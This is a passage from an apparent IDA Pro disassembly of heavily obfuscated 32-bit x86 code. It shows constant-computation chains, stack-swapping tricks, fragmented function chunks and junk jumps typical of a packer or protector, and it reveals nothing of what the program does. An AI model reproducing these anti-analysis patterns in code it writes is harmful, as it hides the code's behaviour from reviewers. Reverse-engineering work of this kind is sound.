; ---------------------------------------------------------------------------
loc_457274: ; CODE XREF: ut7h7i2x:loc_4540A9j
setz al
call sub_45A2AD
pop ecx
jmp loc_44CA15
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_457282: ; CODE XREF: sub_439BF8:loc_4560FBj
push offset sub_445BA6
jmp nullsub_287
; END OF FUNCTION CHUNK FOR sub_439BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_532. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45728D: ; CODE XREF: ut7h7i2x:loc_43D34Fj
jz loc_4525AB
jmp loc_456F3F
; ---------------------------------------------------------------------------
loc_457298: ; DATA XREF: sub_43AA94+14CC7o
xchg edi, [esp]
mov ebx, edi
push offset loc_44A956
jmp loc_443744
; =============== S U B R O U T I N E =======================================
sub_4572A7 proc near ; CODE XREF: ut7h7i2x:00449DA9j
; sub_445188+8CF0p
; FUNCTION CHUNK AT 004400B0 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
push eax
pop ebp
xchg ebp, [esp+0]
mov edx, eax
loc_4572B3: ; CODE XREF: sub_446F62+10223j
call sub_43F058
jmp loc_4400B0
sub_4572A7 endp
; ---------------------------------------------------------------------------
loc_4572BD: ; CODE XREF: ut7h7i2x:004591D6j
jnz loc_449FE5
jmp loc_443D1C
; ---------------------------------------------------------------------------
test ebp, edi
jmp loc_445FE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_4572CF: ; CODE XREF: sub_4529E0:loc_451FC0j
test esi, 40h
jmp loc_45285D
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_4572DA: ; CODE XREF: ut7h7i2x:0044A803j
jl loc_4498D0
; =============== S U B R O U T I N E =======================================
sub_4572E0 proc near ; CODE XREF: sub_439170:loc_45A63Ap
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043CF28 SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
xchg ebx, [esp-4+arg_0]
mov eax, edx
nop
jmp loc_43CF28
sub_4572E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4572EF: ; CODE XREF: ut7h7i2x:004470CBj
jge loc_452B2B
xchg ebp, esi
test esi, edi
jmp loc_4538FE
; ---------------------------------------------------------------------------
shr edx, 0Ch
cdq
jmp sub_43D643
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_431. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446C7B
loc_457308: ; CODE XREF: sub_446C7B+6534j
jg loc_44AF68
loc_45730E: ; CODE XREF: sub_446C7B+17j
or ebx, 4399CB9Bh
rol ebx, 18h
add ebx, 24619E68h
xchg ebx, [esp+0]
jmp loc_4533FD
; END OF FUNCTION CHUNK FOR sub_446C7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_422. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_457326: ; CODE XREF: ut7h7i2x:0044AE6Aj
jmp loc_43A2A6
; ---------------------------------------------------------------------------
loc_45732B: ; CODE XREF: ut7h7i2x:0044B80Dj
mov [esi], ecx
; =============== S U B R O U T I N E =======================================
sub_45732D proc near ; CODE XREF: sub_44DD39-111BCp
xchg esi, [esp+0]
pop esi
mov esp, ebp
pop ebp
retn
sub_45732D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop esi
jmp loc_44B649
; ---------------------------------------------------------------------------
mov esi, [eax]
jmp loc_44469B
; ---------------------------------------------------------------------------
loc_457342: ; DATA XREF: ut7h7i2x:00448A0Do
mov eax, [esp]
push edi
mov edi, edx
xchg edi, [esp]
push esi
push 430E52AAh
xchg eax, [esp]
jmp loc_459C34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_45735A: ; CODE XREF: sub_4503C3-C915j
jmp nullsub_416
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D082
loc_45735F: ; CODE XREF: sub_44D082:loc_43F450j
pop esi
or esi, 71F3D72Fh
xor esi, 794D8BA3h
add eax, esi
xchg ebx, [esp+0]
mov esi, ebx
jmp loc_456ED6
; END OF FUNCTION CHUNK FOR sub_44D082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_457378: ; CODE XREF: sub_449700-818Ej
pop ebp
add ecx, 774216B4h
mov edx, 3059CF34h
loc_457384: ; CODE XREF: sub_449700:loc_441A8Dj
add eax, 0D1B8896Bh
call sub_43AA94
mov ds:off_41D07C, eax
lea eax, sub_43CD08
; END OF FUNCTION CHUNK FOR sub_449700
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_45739B: ; CODE XREF: sub_43CA2D+72F0j
jmp loc_454779
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_4573A0: ; CODE XREF: sub_447CBE:loc_43F2C7j
; sub_43CCC3:loc_451836j
mov dword ptr [ebp-108h], 0Bh
loc_4573AA: ; CODE XREF: sub_45659A+13j
jz loc_4539EE
push offset loc_443C01
jmp nullsub_289
; END OF FUNCTION CHUNK FOR sub_43CCC3
; =============== S U B R O U T I N E =======================================
sub_4573BA proc near ; CODE XREF: ut7h7i2x:0044439Fj
; sub_439D5C+155F8p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004407CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BEE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445407 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452292 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455445 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456282 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458FD7 SIZE 00000010 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
add eax, 2D9736DDh
call sub_43CE34
loc_4573C9: ; CODE XREF: sub_4554BD+7j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_44A89C
or eax, eax
jnz loc_44CE1B
jmp loc_4407CB
sub_4573BA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_4573E2: ; CODE XREF: sub_43AED9:loc_44F331j
jnb loc_43B5FA
jmp loc_4457E0
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_4573ED: ; CODE XREF: sub_44D5BE:loc_444540j
push edx
call sub_452E7F
mov eax, 637A7446h
call sub_457E61
loc_4573FD: ; CODE XREF: ut7h7i2x:00456743j
jmp loc_449542
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_457402: ; CODE XREF: sub_4459EE-BCF3j
jmp loc_44CD0D
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43946A
loc_457407: ; CODE XREF: sub_43946A:loc_44779Aj
push 0AA8E414Dh
pop edx
rol edx, 1
and edx, 0C2D85762h
or edx, 75DB71E0h
and edx, 0FB512824h
add edx, 8EF2E59Eh
xchg edx, [esp+4+var_4]
jmp sub_43BA59
; END OF FUNCTION CHUNK FOR sub_43946A
; =============== S U B R O U T I N E =======================================
sub_45742F proc near ; CODE XREF: ut7h7i2x:00441DF9j
; sub_44EE57+Cp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043A5D3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CA4F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043EED0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004400A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441009 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004413A0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044465C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044493B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004450D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044629F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447505 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A40 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00449F61 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C244 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DF9E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EB58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004518BE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454D2E SIZE 00000019 BYTES
xchg ecx, [esp-8+arg_4]
pop ecx
or eax, eax
jnz loc_450F49
jmp loc_43EED0
sub_45742F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4428C8
loc_457440: ; CODE XREF: sub_4428C8:loc_4429C8j
pop esi
mov ecx, [ecx]
push offset sub_44D169
jmp sub_43E658
; END OF FUNCTION CHUNK FOR sub_4428C8
; ---------------------------------------------------------------------------
loc_45744D: ; CODE XREF: ut7h7i2x:loc_43EEDFj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45744E: ; CODE XREF: sub_457A66-ED0Dj
jmp loc_4496BC
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_457453 proc near ; CODE XREF: ut7h7i2x:00445D1Aj
; sub_43B7F7:loc_454451p
; FUNCTION CHUNK AT 0044C3DA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004578D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458858 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459266 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004596AF SIZE 00000015 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
mov esp, ebp
jmp loc_4578D9
sub_457453 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
loc_45745F: ; CODE XREF: sub_43EB8A+1A844j
jnb loc_4465F2
or ecx, 83021946h
sbb esi, 0E116F190h
add ecx, ebp
shl ebp, 5
jmp loc_451B43
; END OF FUNCTION CHUNK FOR sub_43EB8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_45747B: ; CODE XREF: sub_44C99C+8E04j
push esi
jmp loc_448B0A
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_457481: ; CODE XREF: sub_45601B+Cj
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
jmp loc_449E45
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439A43
loc_45748D: ; CODE XREF: sub_439A43+16j
and ebx, 0B8EDE716h
xor ebx, 2B690857h
add ebx, 6D441607h
xchg ebx, [esp+0]
jmp sub_459036
; END OF FUNCTION CHUNK FOR sub_439A43
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4574A7: ; CODE XREF: sub_442B3B+C2D4j
or dword ptr [eax-8], 8
jmp loc_43AF3B
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_4574B0: ; CODE XREF: sub_44064B-6FA2j
; sub_4423C1+5463j
jno loc_459A10
cmp dword ptr [ebp-10h], 0
jnz loc_43FA11
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 6
jmp loc_447685
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
loc_4574CD: ; CODE XREF: ut7h7i2x:0043C19Ej
sub eax, 60872C7h
; =============== S U B R O U T I N E =======================================
sub_4574D3 proc near ; CODE XREF: ut7h7i2x:004485A4p
xchg esi, [esp+0]
pop esi
mov byte ptr [eax], 0C3h
jmp loc_4418DD
sub_4574D3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop edx
call sub_455B51
loc_4574E5: ; CODE XREF: ut7h7i2x:00455874j
jmp locret_44DF21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_4574EA: ; CODE XREF: sub_45854D-7DE5j
jnz loc_43DA62
sbb eax, 664858A4h
mov [edx], edi
loc_4574F8: ; CODE XREF: sub_4529E0:loc_458B20j
shl eax, 1
jmp loc_43B9DA
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
loc_4574FF: ; CODE XREF: ut7h7i2x:loc_43AFF8j
sbb ecx, eax
popf
jmp loc_443CB9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_457508: ; CODE XREF: ut7h7i2x:00452336j
jmp loc_4493F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_45750D: ; CODE XREF: sub_43DD17+A2F1j
jmp loc_44087A
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_457512: ; CODE XREF: sub_45292B:loc_444E2Aj
; sub_45292B+5A8Ej
xchg esi, [esp+0]
push esi
pop ecx
xchg edx, [esp+0]
mov esi, edx
pop edx
pop ebp
jmp nullsub_295
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_457523: ; CODE XREF: sub_4417AF:loc_441B4Dj
or ebp, 0E2742185h
cdq
ror edx, 13h
jmp loc_43D252
; END OF FUNCTION CHUNK FOR sub_4417AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_457533: ; CODE XREF: sub_439701+1250j
jmp loc_447F2E
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
push eax
ror eax, 8
jmp loc_44BBF5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_457541 proc near ; CODE XREF: sub_43F3D1j
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0044424C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B47C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C2D6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044EA03 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450D9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552F5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004553DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458DA4 SIZE 00000012 BYTES
push ebp
mov ebp, esp
jmp loc_4552F5
sub_457541 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_457549: ; CODE XREF: ut7h7i2x:loc_4593A5j
cmp dword ptr [eax-4], 4
jnz loc_45755C
add dword ptr [ebp-8], 4
jmp loc_4507F1
; ---------------------------------------------------------------------------
loc_45755C: ; CODE XREF: ut7h7i2x:0045754Dj
add dword ptr [ebp-8], 2
jmp loc_449936
; =============== S U B R O U T I N E =======================================
sub_457565 proc near ; CODE XREF: sub_43A513:loc_443D54p
; sub_43A513+985Ap
; FUNCTION CHUNK AT 0043D046 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449DD8 SIZE 0000000B BYTES
push ebp
call sub_442B3B
loc_45756B: ; CODE XREF: sub_449E96:loc_447988j
jz loc_449DE3
jmp loc_43D046
sub_457565 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_457576 proc near ; DATA XREF: sub_43B005+7o
xchg edx, [esp+0]
push 0
push 0
push 0
push 0
push 0
call sub_4479B3
loc_457588: ; CODE XREF: ut7h7i2x:0045493Dj
jmp nullsub_56
sub_457576 endp
; ---------------------------------------------------------------------------
push 3301B130h
pop eax
rol eax, 1Fh
or eax, 72F5FED6h
rol eax, 1Dh
call sub_43E7EC
loc_4575A4: ; CODE XREF: ut7h7i2x:004390BAj
shr ecx, 9
xor ecx, 0EDE44C71h
jmp loc_43FCD3
; ---------------------------------------------------------------------------
loc_4575B2: ; CODE XREF: ut7h7i2x:loc_456199j
pop edx
sub edx, 67336FA1h
rol edx, 4
sub edx, 0FEEADD25h
test edx, 80000000h
jmp loc_43D79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44682E
loc_4575CD: ; CODE XREF: sub_44682E:loc_43AD8Dj
push edx
push eax
push 18B5511Fh
loc_4575D4: ; CODE XREF: sub_43FF65:loc_448581j
pop eax
rol eax, 1Bh
add eax, 77EE40Ch
xchg eax, [esp+8+var_8]
jmp sub_44D8E8
; END OF FUNCTION CHUNK FOR sub_44682E
; ---------------------------------------------------------------------------
loc_4575E6: ; CODE XREF: ut7h7i2x:loc_44B3A4j
xchg esi, [esp]
jmp loc_4567B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4575EE: ; CODE XREF: sub_443BC5:loc_450B3Ej
jz loc_455B19
jmp loc_44C72B
; END OF FUNCTION CHUNK FOR sub_443BC5
; =============== S U B R O U T I N E =======================================
sub_4575F9 proc near ; CODE XREF: ut7h7i2x:0043E54Aj
; ut7h7i2x:loc_4431B5p
xchg ecx, [esp+0]
pop ecx
call nullsub_528
call sub_44E2C4
test al, al
jmp loc_459CEA
sub_4575F9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_45760E: ; CODE XREF: sub_442B3B:loc_43F995j
add eax, ebx
pop ebx
mov eax, [eax]
push eax
push esi
jmp loc_43976D
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FE9
loc_45761A: ; CODE XREF: sub_459FE9:loc_44312Fj
add edx, 68E6A442h
add edx, ebp
add edx, 514AEDD7h
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_453085
; END OF FUNCTION CHUNK FOR sub_459FE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447917
loc_457633: ; CODE XREF: sub_447917-3C0Dj
or ecx, 6E38011Bh
loc_457639: ; CODE XREF: sub_447917:loc_443CFFj
add esi, 6DDC2541h
mov [esi], eax
pop esi
jmp loc_454241
; END OF FUNCTION CHUNK FOR sub_447917
; ---------------------------------------------------------------------------
loc_457647: ; CODE XREF: ut7h7i2x:004534E8j
and edi, 4A57A7AAh
add eax, ebp
pop eax
add esi, edx
loc_457652: ; CODE XREF: ut7h7i2x:loc_447DEDj
cmp dword ptr [ebp-108h], 6C436E6Fh
jnz loc_442C9A
jmp loc_453AB7
; ---------------------------------------------------------------------------
loc_457667: ; DATA XREF: sub_442987+CE54o
mov [ebx], eax
pop ebx
xor eax, eax
push ebx
push 87EAEF59h
pop ebx
rol ebx, 2
jmp loc_44ED3C
; ---------------------------------------------------------------------------
sbb edi, 769C5E2Fh
adc ecx, edx
jmp loc_4589C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456D5F
loc_457689: ; CODE XREF: sub_456D5F+1j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_456D5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_45768E: ; CODE XREF: sub_43F1B2+577Aj
jmp loc_4577B8
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_457693: ; CODE XREF: sub_4518D7-DC48j
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_457698: ; CODE XREF: sub_43C0DA+Cj
jmp loc_44EA78
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_45769D: ; CODE XREF: sub_43A513+Dj
jmp loc_4490C1
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
sub_4576A2 proc near ; CODE XREF: sub_4563CB-15BF5p
; sub_45410C:loc_44E427p ...
; FUNCTION CHUNK AT 00440FA9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448527 SIZE 00000005 BYTES
push esi
mov esi, ecx
jmp loc_448527
sub_4576A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_4576AA: ; CODE XREF: sub_43C9F5:loc_453134j
xchg ebx, [esp+4+var_4]
call sub_43D797
loc_4576B2: ; CODE XREF: ut7h7i2x:loc_445D8Fj
push 0BCD39E0Ch
pop eax
rol eax, 11h
sub eax, 0BE4FF70h
jmp loc_44A164
; END OF FUNCTION CHUNK FOR sub_43C9F5
; =============== S U B R O U T I N E =======================================
sub_4576C6 proc near ; CODE XREF: ut7h7i2x:00448ED7j
; sub_44E2C4:loc_4597AAp
; FUNCTION CHUNK AT 00440891 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004425C7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00446CC5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448F6F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E58B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453412 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F22 SIZE 00000015 BYTES
xchg edi, [esp+0]
pop edi
cmp eax, [edx+18h]
jnb loc_43FBA5
jmp loc_453412
sub_4576C6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4576D8: ; CODE XREF: sub_4503C3+9C40j
shl edx, 2
push ebx
jmp loc_443AA2
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450472
loc_4576E1: ; CODE XREF: sub_450472+Ej
jnz loc_452E91
jmp loc_44BA24
; END OF FUNCTION CHUNK FOR sub_450472
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4576EC: ; CODE XREF: sub_442B3B+10A53j
add edi, 0F6B80D99h
or edi, 0DC98C8FCh
add edi, 2387E3D8h
mov [edi], eax
pop edi
lea eax, sub_457EF4
jmp loc_44AF40
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
locret_45770C: ; CODE XREF: ut7h7i2x:0044F88Aj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DFF
loc_45770D: ; CODE XREF: sub_449DFF+Bj
jmp loc_442F97
; END OF FUNCTION CHUNK FOR sub_449DFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_531. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_457713: ; CODE XREF: sub_4471CA-D83j
jmp loc_455AF4
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_457718: ; CODE XREF: sub_45500F-1902Ej
jmp loc_441AC3
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
loc_45771D: ; CODE XREF: ut7h7i2x:00439F06j
jmp loc_45471E
; ---------------------------------------------------------------------------
locret_457722: ; CODE XREF: ut7h7i2x:loc_454434j
retn
; ---------------------------------------------------------------------------
loc_457723: ; CODE XREF: ut7h7i2x:0045228Dj
jmp locret_4507D6
; ---------------------------------------------------------------------------
loc_457728: ; CODE XREF: ut7h7i2x:0043D19Bj
jno loc_444B26
jb loc_43AA03
jmp loc_453BEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_457739: ; CODE XREF: sub_43A556:loc_44F532j
cmp ebp, 89303A7Eh
jmp loc_453278
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442987
loc_457744: ; CODE XREF: sub_442987+13j
; sub_444273:loc_45473Fj
add ebx, 7457DE23h
and ebx, ds:4000F7h
test ebx, 100000h
jmp loc_44CF57
; END OF FUNCTION CHUNK FOR sub_442987
; =============== S U B R O U T I N E =======================================
sub_45775B proc near ; DATA XREF: sub_444029+13772o
; FUNCTION CHUNK AT 004440ED SIZE 0000000A BYTES
xor eax, 8501FBB5h
add eax, ebp
add eax, 4EB97057h
mov eax, [eax]
jmp loc_4440ED
sub_45775B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_457770: ; CODE XREF: sub_452C66:loc_441F2Ej
push esi
mov esi, edx
xchg esi, [esp+8+var_8]
call sub_4551FB
sub ebp, esi
jmp sub_444BAE
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_457782: ; CODE XREF: sub_442B3B+7A99j
sub ecx, 7204DFC0h
jmp loc_44C9B0
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_45778D: ; CODE XREF: sub_43EF73:loc_458A72j
shr edx, 16h
jmp loc_456E5A
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_457795: ; CODE XREF: sub_444029+1D7Dj
; sub_444029+10AFDj
add eax, 4516D11Ch
push offset sub_45775B
jmp nullsub_301
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_4577A5: ; CODE XREF: sub_43C0DA+6485j
xchg ecx, [esp-4+arg_0]
jmp sub_4548FD
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
push eax
push offset sub_4506D3
jmp locret_450D9D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4577B8: ; CODE XREF: sub_43F1B2:loc_45768Ej
popf
xchg ebp, esi
or eax, ecx
jmp loc_4437CA
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4577C2: ; CODE XREF: sub_43EF73+B74Ej
jg sub_44EFC6
mov esi, [edx]
mov [ebx], ecx
loc_4577CC: ; CODE XREF: sub_43EF73:loc_449F39j
pop large dword ptr fs:0
add esp, 4
jmp loc_44BFBB
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4577DB: ; CODE XREF: sub_439BF8:loc_457DFFj
jb loc_44C0C3
loc_4577E1: ; CODE XREF: sub_441924:loc_457DF7j
or ecx, 711A2FE5h
add ecx, 0D65DBED4h
rol ecx, 10h
xor ecx, 3EB94A07h
xor edx, edx
jmp loc_44344F
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_4577FD: ; CODE XREF: ut7h7i2x:00459A4Ej
add esi, 0FF75B80Fh
xchg esi, [esp]
jmp loc_44E1DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_45780B: ; CODE XREF: sub_4508DB:loc_44F15Ej
lea eax, [ebp+var_20]
push offset loc_45059D
jmp loc_43E3E4
; END OF FUNCTION CHUNK FOR sub_4508DB
; =============== S U B R O U T I N E =======================================
sub_457818 proc near ; CODE XREF: sub_43FF65:loc_445C52p
; ut7h7i2x:0044E95Fj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043ABA5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444F32 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 0044F23E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FB32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455750 SIZE 00000016 BYTES
xchg esi, [esp+0]
pop esi
push 0D23E06BEh
loc_457821: ; CODE XREF: ut7h7i2x:loc_451BC1j
pop eax
rol eax, 6
or eax, 155B8CFBh
jmp loc_444F32
sub_457818 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_457830: ; CODE XREF: ut7h7i2x:0043EE12j
jbe loc_444B5C
; =============== S U B R O U T I N E =======================================
sub_457836 proc near ; CODE XREF: sub_43CDBA+9p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
call sub_444266
loc_457842: ; CODE XREF: sub_440CEC+6E88j
jmp sub_44937E
sub_457836 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 0E44F185Fh
pop eax
xor eax, 58E06E48h
rol eax, 1Eh
add eax, 73FB33D1h
jmp loc_456F87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CB0D
